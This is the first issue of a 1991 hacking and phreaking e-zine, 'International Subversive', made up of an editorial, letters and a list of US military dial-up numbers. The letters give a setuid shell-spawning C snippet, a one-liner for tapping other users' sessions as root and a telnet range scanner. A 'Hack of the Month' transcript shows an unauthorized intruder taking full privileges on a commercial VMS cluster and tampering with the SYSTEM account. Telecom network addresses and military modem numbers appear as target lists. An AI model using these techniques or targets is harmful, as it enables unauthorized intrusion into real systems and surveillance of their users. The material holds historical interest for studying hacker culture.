____       ______  ____  ____          _  ______ ____  __          _
    /   /|  /   /    /     /   /  /|  /  / |   /     /   /  \  /|  / / |   /
   /   / | /   /    /---  /___/  / | /  /__|  /     /   /   / / | / /__|  /
__/_  /  |/   /    /___  /   \  /  |/  /   | /   __/_   \__/ /  |/ /   | /___

                                - SUBVERSIVE - 

                        "If they give you ruled paper,
                         write the other way."
                                 - Juan Ramon Jimenez


                    Volume #1, Issue#1, 28th of July, 1991

                        (A collectors edition we hope)

                                 - WARNING -

 This entire publication (c) 1991 Kieth A. James, all rights reserved. It must
not be reproduced in whole or in part by any form or any method without the
written permission of the copyright holder. The only subscriptions to this said
publication are given to those people on a list which is kept by Kieth A.James
in Sydney, Australia. If the copyright holder of this publication has not
informed you by writing that your name is on the subscription list, then you
are not a subscriber which means you have an illegal copy of this publication
in your posession and have committed an offence.

     -  Contributers  -                   -  Staff  -

  Current:                          Editor: The Chthonic Hvee
                                    Phreaking Tech' Advisor: Trax
  The Chthonic Hvee		    Unix Tech' Advisor: Prime Suspect
  Prime Suspect
* Bigfoot **
* Ron Parise
* Diode                                   -  Sources  -

  -  Subscribers  -                          DoD TACnet
                                             US Sprint
  The Chthonic Hvee                          Tymnet International
  Trax                                       Telecom Australia
  Prime Suspect                              CUD archives

* For security reasons these people do not know they are contributors.

** I might change my mind about Bigfoot in the near future.

                                 [ Contents ]

(1.0)	Contents			- The Chthonic Hvee	       (   2 k)
(1.1)	Editorial			- The Chthonic Hvee	       (   2 k)
(1.2)	Letters				- Various authors	       (   9 k)
(1.3)	Hack of The Month		- Anonymous author	       (   7 k)
(1.4)	US Military Dialup's		- The Chthonic Hvee	       (  39 k)
(1.5)	US Military DSN Numbering	- The Chthonic Hvee	       (   2 k)
(1.6)	Sleeper				- The Chthonic Hvee	       (   3 k)
(1.7)	APM Volume #2 preview		- Trax			       (   8 k)
(1.8)	Tymnet Dialup's & Outdial's	- The Chthonic Hvee	       ( 154 k)
(1.9)	Grabbing Unix Password Files	- Prime Suspect		       (  12 k)
(2.0)	Tracing Information		- Trax			       (   7 k)
(2.1)	Internet MUD list		- Diode			       (  15 k)
(2.2)	Sea Snake's Have Forked Tounges - The Chthonic Hvee	       (   3 k)
(2.3)	Australian 15xxx Scan		- Trax & Crocket	       (   4 k)
(2.4)	The Deffinative Exchange list	- Bigfoot & The Chthonic Hvee  ( 100 k)
(2.5)	Rasputan Sprinter		- The Chthonic Hvee	       (   4 k)
(2.6)	US SprintNet dialups		- The Chthonic Hvee	       (  56 k)
(2.7)	Unix, Shell Capture Trojan	- Trax			       (   3 k)
(2.8)	Shuttle/NASA/UAF Frequencies	- Ron Parise		       (   6 k)
(2.9)	SUTRA, a Unix SU Trojan Horse	- The Chthonic Hvee	       (   4 k)
(3.0)	The Hvee Standed (introduction) - The Chthonic Hvee	       (   2 k)
(3.1)	The Hvee Standed (PTSN)		- The Chthonic Hvee	       (  11 k)
(3.2)	The Hvee Standed (InterNet)	- The Chthonic Hvee	       (  44 k)
(3.3)	Latrobe Plays at Entrapment	- The Chthonic Hvee	       (   6 k)
(3.4)	Sex In Space			- NASA & The Chthonic Hvee     (   9 k)
(3.5)	The End				- The Chthonic Hvee	       (   1 k)


              ____   __    ____ ______  ___     __    ____  _
             /      /  \    /     /    /   \   /  \    /   / |   /
            /----  /   /   /     /    /    /  /___/   /   /__|  /
           /____  /___/ __/_    /     \___/  /  \  __/_  /   | /____

                   Some say the world will end in fire,
                   Some say in ice.
                   From what I've tasted of desire
                   I hold with those who favor fire.
                   But if it had to perish twice,
                   I think I know enough of hate
                   To say that for destruction ice
                   Is also great
                   And would suffice.

                                - Robert Frost

       Welcome to Volume#1 Issue#1 of INTERNATIONAL SUBVERSIVE - an unusual
fugue of hacking, phreaking, politics and radicalism. Lets just hope it works.

 Why am a hacker? Because it is a distraction. A disctraction from death - and
some times a welcome disctraction from life. It's one of my more pleasent
occupations. The most pleasent? Climbing a mountain, sitting upon its peeks
with my True Love, looking into her eyes - and seeing them look back. But that
is another story... 

 Hacking/phreaking is mind over matter. We can do so much, because we have The
Skill, just because of The Skill. With no status, money, class or influence,
and only our minds we can control so much. We have access to so much
information - yeah, I'm a information junkie. We are fucking a fucked system
before it fucks us. This is good.

                             -  Subscription's -

 When I first started writing INTERNATIONAL SUBVERSIVE I did not intend on
making it elitest, but because of all the incriminating material contained
within and the eagerness of the AFP to bust my ass, I am forced to do so.
Depending on who you are, you may or may not be pleased that Issue #1 has a sum
readership of three.

(1) Hvee (me)
(2) Prime Suspect
(3) Trax

 The basic premisse of I.S is to read it, you have to write it. That's that,
no execptions. This means getting new writters is going to be a little bit of a
problem, so I advise you to try and tell people about it, but ONLY via a VF
call - so you know excatly who it is you are speaking to. If you don't think
the person on the other end is upto writing I.S then what the hell are you
doing telling them about it???

 Ok, enough of the sermonic diatribe, welcome to I.S #1

- Hvee


                           ___ ______ ______  ___   __    __
                    /     /      /      /    /     /  \  /  \
                   /     /___   /      /    /___  /   / /__
                  /     /      /      /    /     /__ /     /
                 /____ /___   /      /    /___  /   \  \__/

    (Or where the editor puts everything he doesn't know what to do with)

                              [ Mail Contents ]

(L# 0)	Sending Mail to I.S & Hvee	- The Chthonic Hvee
(L# 1)	Underground FTP site		- The CUD guys
(L# 2)  Becoming Really Effective	- The Chthonic Hvee
(L# 3)	Some Telecom NUA's		- Prime Suspect
(L# 4)	Tapping users from root		- The Chthonic Hvee
(L# 5)	Telnet Scanner			- The Chthonic Hvee & Prime Suspect


Letter#0				From: The Chthonic Hvee
Subject: Sending Mail to I.S & Hvee       To: all

To send mail to I.S (I.e the editor)...

% telnet warhol.art.umich.edu 2000

   This is HERO MUD. Make a new account (if need be) and go to the Post
Office. Send mail to "Hvee". This should be a fairly safe way to get mail to
me. However I suggest you use the folling DES password system...

 (d=day,m=month (AT Hero MUD), !=factorial of, ^=raise power)
 take the first 8 charactors of the resultant (including the ".") of the
 equation (d!+(m+3)^3)*pi

i.e for 31/7/1991

(31!+(7+3)^3)*3.14592654 = 2.5832809508 E+34
first 8 charactors = 2.583280

 This password scheme will change next edition.

(Do I hear a belated sigh of relief?)

     - Hvee


Letter#1				From: tk0jut2
Subject: Underground ftp site.		  To: Hvee

[ Needles to say, if I ever find "International Subversive" available in
 this manner, that will be the last issue you will ever see - Editor ]

To subscribe to the Computer Underground Digest, write to tk0jut2@niu.bitnet.
See the bottom of this file for information on submitting to the archives.

A shadow archive is being maintained in chsun1.uchicago.edu:pub/cud.
Also, an email server is now available at archive-server@chsun1.uchicago.edu.

The Electronic Frontier Foundation's files have been moved to their
own area on ftp.cs.widener.edu .. go to /pub/eff.

On ftp.cs.widener.edu, see the file "uncompressing" for info on how
to uncompress files with a ".Z" extension.

File		Description
----		-----------
ane/*		Anarchy & Explosives Digest, #1-7.

ati/*		The Activist Times Incorporated files, #1-53.
Files #4 and #9 are missing. [ They supposedly don't exist. ]
Contact akcs.groundzero@tronsbox.xei.com for info on
future issues.

bootlegger/*	Issues 6 and 7 of the Bootlegger misc. info collections.

chalisti/*	The Chalisti German Newsletter, #1-12. [ They're in German.
Some ambitious and talented linguicist care to translate 'em? ]

cud/*		The Computer Underground Digest, #1.00 - 3.07.
Also: Indices to Volumes 1 and 2; Niedorf Flash.
Contact tk0jut2@niu.bitnet for a subscription.

hnet/*		H-Net Digest, #1. (Started June 1990) (None since)

law/<state>	Current computer crime laws are online for:
 AL, AK, AZ, CA, CO, CT, DE, FL, GA, HI, IA, ID, IL,
 IN, MD, MN, NJ, NY, TX, VT, VA, and WV.
(Everyone [law students especially] is encouraged to send
along other statutes...we want to build this area up to
[hopefully] a full set.)
Still needed: AR, DC, KS, KY, ME, MI, MO, MS, MT, NC, ND,
     NH, NM, NV, OK, RI, SC, SD, TN, UT, WI, WY

law/<country>	Current computer crime laws are online for:
The United States (federal code), Canada, and Great Britain.

lod/*		The LOD/H Technical Journals, #1-4.

narc/*		The Nuclear Anarchists/Phreakers/Hackers Digest, #1-7.

networks/*	Acceptable Use Policies for a number of networks.
See networks/Index for more information.

nia/*		The Network Information Access Newsletter, #1-69.
Contact elisem@nuchat.sccsi.com for more information
about NIA.

papers/alcor	An account of the Alcor Cryonics suit against the government
for alleged wrongful seizure of email.

To be in F. Schmalleger's "Computers In Criminal Justice"
``The Baudy World of the Byte Bandit: A Postmodernist
Interpretation of the Computer Underground''
by Gordon Meyer and Jim Thomas

papers/biblio	A bibliography of news articles put together by Bob Krause.

papers/candp	"Story" of sorts describing a view on the world in which
we live.
``Crime and Puzzlement''
by John Barlow (an EFF founder)

"Civil Disobedience" by Thoreau.

The 2600 Magazine article about Crime & Puzzlement.

papers/denning	Paper to be presented to 13th Nat'l Comp Security Conf
``Concerning Hackers Who Break into Computer Systems''
by Dorothy E Denning

About Dennis Hayes' arrest & conviction for copyright

A letter from the Director of the Secret Service to US
Rep. Don Edwards, D-California, in response to questions
raised by Edwards' Subcommittee. This copy came from
Computer Professionals for Social Responsibility in
Washington, D.C.

A description of how information's stored on the FBI's
computer systems.

Article on the rights of email privacy.

papers/len.rose	A compilation of information on Len Rose's situation.

papers/meyer	Masters Thesis:
The Social Organization of the Computer Underground
by Gordon Meyer

An FYI about the proposed NREN setup.

papers/sundevil	A collection of information on Operation SunDevil by
the Epic nonprofit publishing project. Everything you
wanted to know but could never find.

Article by William Cook, US Attorney in the Neidorf trial.

phantasy/*	Phantasy Newsletter, Volume 1 #1-4.

phrack/*	PHRACK Magazine, #1-32. (Phrack Classic as of #32.)
If you have trouble FTPing #32, get it in BINARY mode.
Contact ps@well.sf.ca.us for information about future issues.

phun/*		PHun Magazine, #1-5.

pirate/*	Pirate Magazine, #1-5.

schools/*	The policies of a number of schools.
See schools/Index for a full list & description of these.

synd/*		The Syndicate Reports, #1-17, 20. [ If you have #18-20, please
send them in! We can't find them. ]

tap/*		The TAP Magazine Online, #1.

Any requests for files to be added to the archives should be sent via email to
cudarch@cs.widener.edu, cudarch@chsun1.uchicago.edu, or tk0jut2@niu.bitnet.


Letter#2				From: The Chthonic Hvee
Subject: Becoming Really Effective.	  To: all

  I use this when you have another users EUID (I.e SETUID root) but not their
real UID.

[ suzzy.c ]

int argc;
char *argv[];
 execl(argv[1],argv[1],argv[2],argv[3],argv[4],argv[5],(char *)0);

[ Cut ]

So now if you want to run /bin/csh say and you have your EUID != UID.

% cc -o suzzy suzzy.c
% suzzy /bin/csh

- Hvee


Letter#3				From: Prime Suspect
Subject: Some Telecom NUA's (QLD)	  To: all


270523008	-       (xenix)
271223005	-       "mbora"
272324014	-	"market"
272324009	-	"network"
272324012	-	"finance"
277723001	-	"tville" (Townsville)
279523008	-	"mackay"
279223008	-	"rocky1"
270523018	-	"carnes exchange"
       272325004	-	"holly"
276323013	-	"twmba" (Towoomba)
272323002	-	"castor"
272322003	-	"castor2"

- Prime Suspect


Letter#4				From: The Chthonic Hvee
Subject: Tapping users from root.

Install "script" into their logon shell, but failing that, have a look at the
processes they are running, then...

% trace -p PID|awk -F\" '/write/ {print $2}'

You will need to beautify the output a little, depending on what sort of task
you are tapping.

- Hvee


Letter#5				From: The Chthonic Hvee
Subject: Telnet Scanner			  To: all

 Thanks to Prime for the basic idea.

This little script will scan an IP address and tell you all the ones it
connects to.


% nohup tspr 26.8.0 &

- Hvee

#"tspr" by TCH July, 1991
#Usage: tspr xx.xx.xx
while expr $d \< 256 >/dev/null
 telnet $1.$d 1>$1.$d 2>&1 &
 sleep 2
 d=`expr $d + 1`
egrep '[Cc]onnected' $1.* >$out
rm $1.*


           -----------------> Hack of the Month <-----------------

 OWNER: TimeLine.
   USE: Multi-application, many differant companies have accounts.
  WHEN: June, 1991.
 WHERE: PSS/AustPac - Melbourne.
HACKER: Anonymous.
CONTROL: Complete/System Operator.

    TimeLine - (from what I saw) a Cluster of 4 or so large DEC VMS
   machines - the central host being VAX7; a DEC 6420 running VMS V5.2.
  VAX7 seems to have a large and extreamly varied user population, ranging
  from "The Commenwealth Bank", "Elders Corporate", "Boyne Smelters Ltd",
  "BHP Ltd", "CRAA Charge Card", "Telecom Australia" to "WA - Min of Ed",
  "Liberal Party (vic)", "W.A. Premiers Dept", "Election 87 - Data
  Collection", Individual users & software development teams. In this
  respect it reminds me very much of good old Minerva (Dialcom/Primos).

Note: The "Liberal" Party in Australia is the largest right wing party. I know
     this is a contradiction in terms - but it was the bastard child, born in
     in the late 40's (?) to an even more right wing/royalist/british group.



AUSTPAC   0xx 0xx 0xx

xxx, xxx/06/91 - xx.xx.xx EST
Timeline - Comms Network  ---  MELBOURNE

Select Service: vax7

       Timeline VaxCluster node VAX7 (6420) running VMS V5.2

Username: LIB
Password: xxxxxxxxxx

       Welcome to VAX/VMS version V5.2 on node VAX7
   Last interactive login on xxxxxxxxx, xx-JUN-1991 xx:xx
Terminal: _VAX7$VTA15xx:, LAT id: _LTA15xx:, Server/Port: TS2/PORT_x

VAX7>set proc /priv=all

VAX7>show proc /priv

xx-JUN-1991 xx:xx:xx.xx   User: LIB              Process ID:   24C0xxxx
                         Node: VAX7             Process name: "LIB"

Process privileges:
CMKRNL               may change mode to kernel
CMEXEC               may change mode to exec
SYSNAM               may insert in system logical name table
GRPNAM               may insert in group logical name table
ALLSPOOL             may allocate spooled device
DETACH               may create detached processes
DIAGNOSE             may diagnose devices
LOG_IO               may do logical i/o
GROUP                may affect other processes in same group
ACNT                 may suppress accounting message
PRMCEB               may create permanent common event clusters
PRMMBX               may create permanent mailbox
PSWAPM               may change process swap mode
ALTPRI               may set any priority value
SETPRV               may set any privilege bit
TMPMBX               may create temporary mailbox
WORLD                may affect other processes in the world
MOUNT                may execute mount acp function
OPER                 operator privilege
EXQUOTA              may exceed quota
NETMBX               may create network device
VOLPRO               may override volume protection
PHY_IO               may do physical i/o
BUGCHK               may make bug check log entries
PRMGBL               may create permanent global sections
SYSGBL               may create system wide global sections
PFNMAP               may map to specific physical pages
SHMEM                may create/delete objects in shared memory
SYSPRV               may access objects via system protection
BYPASS               bypasses UIC checking
SYSLCK               may lock system wide resources
SHARE                may assign channels to non-shared device
GRPPRV               group access via system protection
READALL              may read anything as the owner
SECURITY             may perform security functions

Process rights identifiers:

VAX7>set def sys$sysroot:[sysexe]

VAX7>run authorize

UAF> show system

Username: SYSTEM                           Owner:  VMS - System Manager
Account:  SYSTEM 0                         UIC:    [1,4] ([SYSTEM])
CLI:      DCL                              Tables: 
Login Flags: 
Primary days:   Mon Tue Wed Thu Fri Sat Sun
Secondary days:                            
No access restrictions
Expiration:            (none)    Pwdminimum:  6   Login Fails:     0
Pwdlifetime:           (none)    Pwdchange:   2-MAY-1991 11:20 
Last Login: xx-JUN-1991 xx:xx (interactive), xx-JUN-1991 xx:xx (non-interactive)

Maxjobs:         0  Fillm:       150  Bytlm:        36000
Maxacctjobs:     0  Shrfillm:      0  Pbytlm:           0
Maxdetach:       0  BIOlm:        50  JTquota:       1024
Prclm:          10  DIOlm:        18  WSdef:          256
Prio:            4  ASTlm:        80  WSquo:          512
Queprio:         0  TQElm:        50  WSextent:      8192
CPU:        (none)  Enqlm:       200  Pgflquo:      30000
Authorized Privileges: 
Default Privileges: 

UAF> modify system /flags=disuser   [ Now for some fun... - Ed ]

%UAF-I-MDFYMSG, user record(s) updated

UAF> show system

Username: SYSTEM                           Owner:  VMS - System Manager
Account:  SYSTEM 0                         UIC:    [1,4] ([SYSTEM])
CLI:      DCL                              Tables: 
Login Flags:  Disuser
Primary days:   Mon Tue Wed Thu Fri Sat Sun
Secondary days:                            
No access restrictions
Expiration:            (none)    Pwdminimum:  6   Login Fails:     0
Pwdlifetime:           (none)    Pwdchange:   2-MAY-1991 11:20 
Last Login: xx-JUN-1991 xx:xx (interactive), xx-JUN-1991 xx:xx (non-interactive)

Maxjobs:         0  Fillm:       150  Bytlm:        36000
Maxacctjobs:     0  Shrfillm:      0  Pbytlm:           0
Maxdetach:       0  BIOlm:        50  JTquota:       1024
Prclm:          10  DIOlm:        18  WSdef:          256
Prio:            4  ASTlm:        80  WSquo:          512
Queprio:         0  TQElm:        50  WSextent:      8192
CPU:        (none)  Enqlm:       200  Pgflquo:      30000
Authorized Privileges: 
Default Privileges: 

UAF> modify system /flags=nodisuser  [ "The golden rule of hacking...",
                                       Leave everything just as you
                                       found it. It killed me to do
do this, but I guess the
Liberal Party of VIC is only
one user. ]

%UAF-I-MDFYMSG, user record(s) updated

UAF> *Interrupt* 


 LIB          logged out at xx-JUN-1991 xx:xx:xx.xx

CLR DTE  000


[ Thanks to Trax for the NUA ]


                        TAC DIALUPS SORTED BY LOCATION
                              The Chthonic Hvee

    It is amazing what one can find lying around the world if one examines in
right places. Here for example, we have a 35k list of PTSN/DSN lines to U.S
military computers. Mostly TAC servers from what I have seen.

  There are two sections to this list, the first (and larger) part is one of
U.S dialups, and the second - the rest of the world. Hvee was quite amused and
concerned to note some of the countries that appeared in the the second half.
Countries like "Panama", "Guam" and "The Netherlands" - all countries that I
had previously thought only had week or no ties with the U.S - and yet it is
in those very countries we find U.S dialup lines. I'm also rather alarmed about
large size of the instalations in Greece...

  - Hvee


 1.  Rotary lines are in parenthesis following the phone number.
     For example, "(R10)" indicates a rotary with 10 lines.

 2.  (M) = Military DoD Telephone System, (C) = Commercial Telephone System.

 3.  Modem compatibility is in curley braces {}.

      B/V =  Bell and Vadic
      B   =  Bell 212A only
      V   =  Vadic 3400 only
      H   =  Hayes error correction protocol at 9600 baud
      M   =  MNP error correction protocol at 9600 baud
      24  =  2400 Baud capability          (CCITT V.22 bis)
      V.21=  European Standard CCITT V.21  (300 baud)
      V.22=  European Standard CCITT V.22  (1200 baud)
      V.23=  European Standard CCITT V.23  (1200/600 baud)

 4.  The MILNET toll-free TAC number is (800) 368-2217.



           (205) 237-5731 (R8) [300/1200 bps] {B}

           (205) 255-4961 (R8) [300/1200 bps] {B}
           (205) 255-4049 (R8) [300/1200 bps] {B}

           (205) 876-8051 (R5) [1200 bps] {B}
           (205) 876-9791 (R5) [1200 bps] {B}

           (205) 279-4115 [300/1200 bps] {B}
           (205) 279-4303 [300/1200 bps] {B}


           (907) 552-2821 (R8) [300/1200 bps] {B}
           (907) 552-4601 (R8) [300/1200 bps] {B}

           (907) 377-2500 (R8) [300/1200 bps] {B}
           (907) 377-2508 (R8) [300/1200 bps] {B}

     Junction City
           (907) 873-4141 (R8) [300/1200 bps] {B}
           (907) 873-4153 (R8) [300/1200 bps] {B}


     Davis Monthan
           (602) 750-3778 [300/1200 bps] {B}
           (602) 750-3973 [300/1200 bps] {B}
           (602) 750-4338 [300/1200 bps] {B}
           (602) 750-4342 [300/1200 bps] {B}
           (602) 750-4378 [300/1200 bps] {B}
           (602) 750-4398 [300/1200 bps] {B}
           (602) 750-4403 [300/1200 bps] {B}
           (602) 750-4411 [300/1200 bps] {B}
           (602) 750-4419 [300/1200 bps] {B}
           (602) 750-4446 [300/1200 bps] {B}
           (602) 750-4471 [300/1200 bps] {B}
           (602) 750-4495 [300/1200 bps] {B}
           (602) 750-4502 [300/1200 bps] {B}
           (602) 750-4509 [300/1200 bps] {B}
           (602) 750-4510 [300/1200 bps] {B}
           (602) 750-4515 [300/1200 bps] {B}

           (602) 856-6923 (R8) [300/1200 bps] {B}

     Sierra Vista
           (602) 538-0770 (R8) [300/1200 bps] {B}

     Yuma Proving Ground
           (602) 328-3181 (R8) [300/1200 bps] {B}


           (415) 769-6144 (R8) [300/1200 bps] {B}
           (415) 769-6216 (R8) [300/1200 bps] {B}

     China Lake
           [None known]

           (714) 734-4700 (R8) [300/1200 bps] {B}

           (805) 277-7949 [300/1200 bps] {B}
           (805) 277-7966 [300/1200 bps] {B}
           (805) 277-7968 [300/1200 bps] {B}
           (805) 277-7970 [300/1200 bps] {B}
           (805) 277-7971 [300/1200 bps] {B}
           (805) 277-7972 [300/1200 bps] {B}
           (805) 277-7973 [300/1200 bps] {B}
           (805) 277-7974 [300/1200 bps] {B}

     El Segundo
           (213) 536-0308 (R8) [300/1200 bps] {B}
           (213) 643-8501 (R8) [300/1200 bps] {B}

           (213) 643-6883 [1200] {B}

           (209) 982-0831 (R8) [300/1200 bps] {B}

     Menlo Park
           (415) 859-5410 (R8) [300/1200 bps] {B}

           [None known]

           (408) 647-8422 (R8) [300/1200 bps] {B}

           (408) 242-0101 (R8) [300/1200 bps] {B}
           (408) 242-0102 (R8) [300/1200 bps] {B}

     Mountain View
           (415) 962-8851 (R8) [300/1200 bps] {B}

           (415) 452-1346 [300/1200 bps] {B}
           (415) 452-1347 [300/1200 bps] {B}
           (415) 452-1348 [300/1200 bps] {B}
           (415) 452-1434 [300/1200 bps] {B}
           (415) 452-1435 [300/1200 bps] {B}
           (415) 452-1436 [300/1200 bps] {B}
           (415) 452-1541 [300/1200 bps] {B}
           (415) 452-1542 [300/1200 bps] {B}

           (805) 984-0413  [300/1200 bps] {B}
           (805) 984-0426  [300/1200 bps] {B}
           (805) 984-1467  [300/1200 bps] {B}
           (805) 984-2705  [300/1200 bps] {B}
           (805) 984-2864  [300/1200 bps] {B}
           (805) 984-3347  [300/1200 bps] {B}
           (805) 984-3895  [300/1200 bps] {B}
           (805) 984-5457  [300/1200 bps] {B}

     Point Mugu
           (805) 989-1028 (R8) [300/1200 bps] {B}

           (714) 655-5560 (R8) [300/1200 bps] {B}
           (714) 655-5672 (R8) [300/1200 bps] {B}

           (916) 643-1701 (R8) [300/1200 bps] {B}

           (916) 643-1002 (R8) [300/1200 bps] {B}

           (916) 388-2604 (R8) [300/1200 bps] {B}

     San Diego
           [None known]

           (619) 222-5809 (R8) [300/1200 bps] {B}

           (619) 224-8251 (R8) [300/1200 bps] {B}

     San Francisco
           (415) 561-6490 (R8) [300/1200 bps] {B}

     San Miguel
           (805) 239-2780 (R8) [300/1200 bps] {B}

           [None known]


           (303) 361-3105 (R16) [300/1200 bps] {B}

     Colorado Springs
           (719) 554-6792 (R8) [300/1200 bps] {B}

           (303) 676-7782 (R8) [300/1200 bps] {B}

           (303) 676-7591 (R8) [300/1200 bps] {B}

  District of Columbia

           (202) 692-7580 (DSN) 222-7580

           (703) 553-0229 (R8) [300/1200 bps] {B}
           (703) 553-0238 (R8) [300/1200 bps] {B}

           (202) 574-8308 [300/1200 bps] {B}
           (202) 574-8309 [300/1200 bps] {B}
           (202) 574-8311 [300/1200 bps] {B}
           (202) 574-8313 [300/1200 bps] {B}
           (202) 574-8314 [300/1200 bps] {B}
           (202) 574-8315 [300/1200 bps] {B}
           (202) 574-8318 [300/1200 bps] {B}
           (202) 574-8327 [300/1200 bps] {B}


     Cocoa Beach
           (407) 494-4131 (R8) [300/1200 bps] {B}

     Fort Walton Beach
           (904) 678-8450 [300/1200 bps] {B}
           (904) 678-1237 [300/1200 bps] {B}
           (904) 678-1268 [300/1200 bps] {B}
           (904) 678-9183 [300/1200 bps] {B}
           (904) 678-4937 [300/1200 bps] {B}
           (904) 678-6025 [300/1200 bps] {B}
           (904) 678-5812 [300/1200 bps] {B}
           (904) 678-6315 [300/1200 bps] {B}

           (305) 257-7890 (R8) [300/1200 bps] {B}

           (904) 777-3006 (R8) [300/1200 bps] {B}

           (407) 277-0005 (R8) [300/1200 bps] {B}

           (904) 457-1199 (R8) [300/1200 bps] {B}

           (813) 830-4270 (R8) [300/1200 bps] {B}


           (404) 669-7910 (R8) [300/1200 bps] {B}

           (404) 791-5426 (R16) [300/1200 bps] {B}

           (404) 545-5181 (R5) [300/1200 bps] {B}
           (404) 545-2111 (R6) [300/1200 bps] {B}
           (404) 545-2164 (R5) [300/1200 bps] {B}

           (912) 767-5800 (R8) [300/1200 bps] {B}

           (404) 423-0309 (R8) [300/1200 bps] {B}
           (404) 423-0320 [300/1200 bps] {B}
           (404) 423-0322 [300/1200 bps] {B}
           (404) 423-0337 [300/1200 bps] {B}
           (404) 423-0355 [300/1200 bps] {B}
           (404) 423-0356 [300/1200 bps] {B}
           (404) 423-0357 [300/1200 bps] {B}
           (404) 423-0511 [300/1200 bps] {B}

     Robins Air Force Base
           (912) 926-1650 (R8) [300/1200 bps] {B}

           (912) 926-2719 (R8) [300/1200 bps] {B}


     Camp H.M. Smith
           (None Known)

           (808) 449-5421 (R24) (C) [300/1200 bps] {B}

           (808) 423-9602 (R8) (C) [300/1200 bps] {B}
           (808) 423-6611 (R8) (C) [300/1200 bps] {B}

           (808) 438-7300 (R16) (C) [300/1200 bps] {B}

           (808) 653-1600 (R16) (C) [300/1200 BPS] {B}

           [None known]


           (708) 972-6241       [300/1200 bps] {B}
           (708) 972-6104       [300/1200 bps] {B}
           (708) 972-6060 (R6)  [300/1200 bps] {B}

           [None known]

           (618) 256-6285 (R3) [300/1200 bps] {B}
           (618) 256-6772 (R8) [300/1200 bps] {B}

     Highland Park
           (708) 926-6060 (R8) [300/1200 bps] {B}
           (708) 926-6069 (R8) [300/1200 bps] {B}

     North Chicago
           (708) 578-9000 (R8) [300/1200 bps] {B}

     Rock Island
           (309) 782-6939 (R8) [300/1200 bps] {B}


           [None known]

           (317) 542-2554 (R8) [300/1200/2400 bps]  {B}
           (317) 542-2555 (R8) [300/1200/2400 bps]  {B}

           (317) 543-6624 [300/1200 bps] {B}


     Junction City
           (913) 239-3432 (R8) [300/1200 bps] {B}

           (913) 651-7041 (R8) [300/1200 bps] {B}
           (913) 684-7653 (R8) [300/1200 bps] {B}


           (502) 798-2866 (R8) [300/1200 BPS] {B}

     Fort Knox
           (502) 624-2761 (R8) [300/1200 bps] {B}
           (502) 624-5201 (R8) [300/1200 bps] {B}


     Bossier City
           (318) 741-3806 (R8) [300/1200 bps] {B}
           (318) 456-2301 (R8) [300/1200 bps] {B}

           (318) 535-2962 (R8) [300/1200 bps] {B}

     New Orleans
           (504) 944-8702 (R8) [300/1200 bps] {B}


           (207) 999-2283 (R4) [300/1200 bps] {B}
           (207) 999-2267 (R4) [300/1200 bps] {B}


           (301) 273-6000 (R8) [300/1200 bps] {B}

           (301) 671-6990 (R8) [300/1200 bps] {B}

           (301) 229-3100 (R8)  [300/1200 bps] {B/V}
           (301) 229-4800 (R8)  [300/1200 bps] {B/V}

     Camp Springs
           (301) 967-7930 (R8) [300/1200 bps] {B}
           (301) 967-7938 (R8) [300/1200 bps] {B}

           (301) 241-4901 (R8) [300/1200 bps] {B}

           [None known]

           (301) 695-0300 (R8) [300/1200 bps] {B}

           [None known]

     Lexington Park
           [None known]

     Silver Spring
           (301) 572-5960 (R8) [300/1200 bps] {B}

     St. Inigoes
           (301) 872-9002 (R8) [300/1200 bps] {B}
           (301) 872-9092 (R8) [300/1200 bps] {B}


           (617) 497-0180 [300/1200 bps] {B}
           (617) 497-1220 [300/1200 bps] {B}
           (617) 497-1229 [300/1200 bps] {B}
           (617) 497-2036 [300/1200 bps] {B}
           (617) 497-2037 [300/1200 bps] {B}
           (617) 497-4235 [300/1200 bps] {B}
           (617) 497-4261 [300/1200 bps] {B}
           (617) 497-4278 [300/1200 bps] {B}

     Hanscom Air Force Base
           (617) 377-3000 (R8) [300/1200 bps] {B}

           [None known]


     Battle Creek
           (616) 961-4550 (R8) [1200 bps] {B}

           (313) 574-5164 (R8) [300/1200 bps] {B}


           (601) 377-3610 (R5) [300/1200 bps] {B}
           (601) 377-3910 (R5) [300/1200 bps] {B}


     St. Louis
           (314) 381-8460 (R8) [300/1200 bps] {B}
           (314) 381-5942  [300/1200 bps] {B}
           (314) 381-5961  [300/1200 bps] {B}
           (314) 381-5988  [300/1200 bps] {B}
           (314) 381-6014  [300/1200 bps] {B}
           (314) 381-6307  [300/1200 bps] {B}
           (314) 381-6433  [300/1200 bps] {B}
           (314) 381-2147  [300/1200 bps] {B}

           [None known]


     Great Falls
           (406) 731-2140 (R8) [300/1200 bps] {B}


           [None known]

           (402) 292-4638 (R8) [300/1200/2400/4800/9600 bps] {B,H}
           (402) 294-6790 (R8) [300/1200/2400/4800/9600 bps] {B,H}

           [None known]

  New Jersey

           (201) 724-6731 (R8) [300/1200 bps] {B/V}

     Red Bank
           (201) 544-3282 (R8) [300/1200 bps] {B}
           (201) 544-2767      [300/1200 bps] {B}
           (201) 544-4859      [300/1200 bps] {B}
           (201) 544-2758      [300/1200 bps] {B}
           (201) 544-2636      [300/1200 bps] {B}
           (201) 544-2129      [300/1200 bps] {B}
           (201) 544-2113      [300/1200 bps] {B}
           (201) 544-4718      [300/1200 bps] {B}
           (201) 544-2062      [300/1200 bps] {B}

           (609) 562-3021 (R8) [300/1200 bps} {B}

  New Mexico

           (505) 846-5429 (R6) [300/1200 bps] {B}

           (505) 846-2494 (R8) [300/1200 bps] {B}

     Las Cruces
           [no dialups; contact NSC for access]
           Claude (Skeet) Steffey - (505) 678-1271  (DSN) 258-1271

  New York

           (315) 339-4913 (R5) [300/1200 bps] {B}
           (315) 337-2004      [300/1200 bps] {B}
           (315) 337-2005      [300/1200 bps] {B}
           (315) 330-2294      [300/1200 bps] {B}
           (315) 330-3587      [300/1200 bps] {B}
           (315) 330-3044      [300/1200 bps] {B}
           (315) 330-3240      [300/1200 bps] {B}

     West Point
           (914) 446-6715 (R8) [300/1200 bps] {B}

  North Carolina

           (919) 396-1181 (R8) [300/1200 bps] {B}
           (919) 396-1251 (R8) [300/1200 bps] {B}

           (919) 736-6850 (R8) [300/1200 bps] {B}

  North Dakota

     Grand Forks
           (701) 747-6681 (R8) [300/1200 bps] {B}


           (216) 761-6077 (R8) [1200 bps] {B}

           [None known]

           (513) 476-4218 (R6) [300/1200 bps] {B/V}

           (513) 257-2172 (R8) [300/1200 bps] {B}
           (513) 257-2690 (R8) [300/1200 bps] {B}
           (513) 257-3625 (R8) [300/1200 bps] {B}

           (513) 259-9711 (R8) [300/1200 bps] {B}

           (513) 476-4915 [300/1200 bps] {B}
           (513) 476-4487 [300/1200 bps] {B}
